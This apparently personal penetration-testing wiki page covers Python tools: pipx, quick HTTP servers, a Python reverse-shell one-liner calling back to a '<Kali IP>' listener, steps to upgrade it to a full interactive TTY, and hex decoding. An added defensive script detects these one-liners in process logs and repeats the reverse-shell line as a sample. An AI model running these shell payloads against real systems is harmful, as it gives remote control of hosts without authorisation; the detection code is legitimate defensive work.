Alvin Smith edited this page Apr 9, 2024 · 18 revisions

Resources

pipx install PACKAGE

This automatically creates a virtual environment, installs the package, and adds the package's associated applications (entry points) to a location on your PATH. For example, pipx install pycowsay makes the pycowsay command available globally, but sandboxes the pycowsay package in its own virtual environment. pipx never needs to run as sudo to do this.

https://github.com/pypa/pipx

Adamantly scripts

https://github.com/A1vinSmith/arbitrary-python

HTTP server

Python2

python -m SimpleHTTPServer 80

Python3

python3 -m http.server

The default port is 8000.

If not working:

script /dev/null -c bash

Get a stable shell

  1. Start another netcat listener for the command below:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  2. However, this shell still won't do what we want it to, so we need to get a full tty for an interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'

or

python3 -c 'import pty; pty.spawn("/bin/bash")'
  3. If phase 2 does not get the job done (Python spawns a better-featured bash shell, but you still won't be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell):
export TERM=xterm  # gives us access to terminal commands such as clear
  4. Press CTRL+Z to put the shell in the background. Next, type this command in the same window: stty raw -echo;fg. This will bring your shell back to the foreground with a fully interactive experience. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.

PS: Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press Enter.

  5. OPTIONAL: adjust the tty size
❯ tput cols
124
                                                                                                                            
❯ tput lines
56

stty rows 56 columns 124
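
A defender's view of the steps above, as an added example that is not part of the original wiki: it classifies recorded process command lines (for instance from auditd or EDR process telemetry) that match the one-liners on this page. The rule names, the sample lines and the 192.0.2.10 address are constructed for illustration.

```python
import re
import shlex
from pathlib import PurePosixPath

SHELL_NAMES = ("bash", "dash", "zsh", "sh")
SHELL_PATH = r"/bin/(?:" + "|".join(SHELL_NAMES) + r")"
PY_INTERPRETER = re.compile(r"^python(\d+(\.\d+)?)?$")

# Hypothetical rule names; the patterns mirror the python -c one-liners above.
INLINE_RULES = {
    "socket_fd_redirect_shell": re.compile(
        r"socket\.socket\(.*\.connect\(.*os\.dup2\(.*" + SHELL_PATH, re.S),
    "pty_spawn_shell": re.compile(r"pty\.spawn\(\s*['\"]" + SHELL_PATH + r"['\"]"),
}

# Constructed sample: one recorded process command line per row.
SAMPLE = r"""
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.10",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c bash
python3 -m http.server
python3 -c 'print(bytes.fromhex("20"))'
script session.log
"""

def classify(cmdline):
    """Return the sorted rule names that one process command line matches."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        argv = cmdline.split()
    if not argv or "-c" not in argv[1:-1]:
        return []
    prog = PurePosixPath(argv[0]).name
    inline = argv[argv.index("-c") + 1:]  # the -c payload and anything after it
    hits = set()
    if PY_INTERPRETER.match(prog):
        code = " ".join(inline)
        hits.update(name for name, rx in INLINE_RULES.items() if rx.search(code))
    elif prog == "script" and "/dev/null" in argv:
        # script(1) allocates a pty; /dev/null discards the typescript file.
        cmd = inline[0].split()
        if cmd and PurePosixPath(cmd[0]).name in SHELL_NAMES:
            hits.add("script_pty_shell")
    return sorted(hits)

if __name__ == "__main__":
    for line in SAMPLE.strip().splitlines():
        print(classify(line) or "-", "|", line[:60])
```

The stty raw -echo;fg step is typed in the operator's own terminal, so it never appears in the target host's process telemetry; only the python and script invocations do.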

Handle Hex

0x2f6574632f686f73746e616d65
# Strip the 0x prefix first: bytes.fromhex() rejects it.
print(bytes.fromhex('2f6574632f686f73746e616d65'))  # b'/etc/hostname'

0x20
print(bytes.fromhex('20'))  # b' '